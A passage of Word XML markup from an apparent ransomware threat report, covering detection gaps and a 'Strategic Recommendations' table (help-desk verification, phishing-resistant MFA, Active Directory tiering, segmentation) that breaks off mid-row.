          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> readings; and (iii) poor visibility of hypervisor-layer activities before mass encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53219A10" w14:textId="17D02A7A" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.7 Strategic Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4B20485B" w14:textId="2B48C656" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Recommendations are prioritized and classified under Prevention, Detection and Response, each with a rationale and an indicative effort range (Low / Medium / High).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="846"/>
        <w:gridCol w:w="3763"/>
        <w:gridCol w:w="3750"/>
        <w:gridCol w:w="1001"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="662BC142" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30849E28" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AB428DD" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C90994D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7255F1D7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="04885D91" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="37A2006E" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5CF754AD" w14:textId="6E7523A0" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Harden help-desk identification verification (call-back, manager permission, in-person for privileged accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17784D16" w14:textId="737A0854" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Directly closes the initial-access vector (T1566.004/T1621) to the campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D320F78" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Low–Med</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="567112C0" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E7A3799" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31B3E411" w14:textId="541DF102" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Implement phishing-resistant MFA (FIDO2 / hardware keys) for privileged and remote access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D4120D6" w14:textId="5D87BD12" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Takes away the reset-and-bypass path that push-based MFA opened up.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2695A895" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="42A3F550" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4AE9398C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70519BFA" w14:textId="1332DDD8" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Directory: tiered administration + least privilege; protect </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05D9CA26" w14:textId="526A6AE9" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Prevents a single identity compromise from cascading to domain domination (T1003.003</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>).Rising</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F2CBEE4" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="1870ED21" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2706D8A7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4CB2494C" w14:textId="104032DE" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network segmentation and zero-trust access across user, server and virtualisation layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
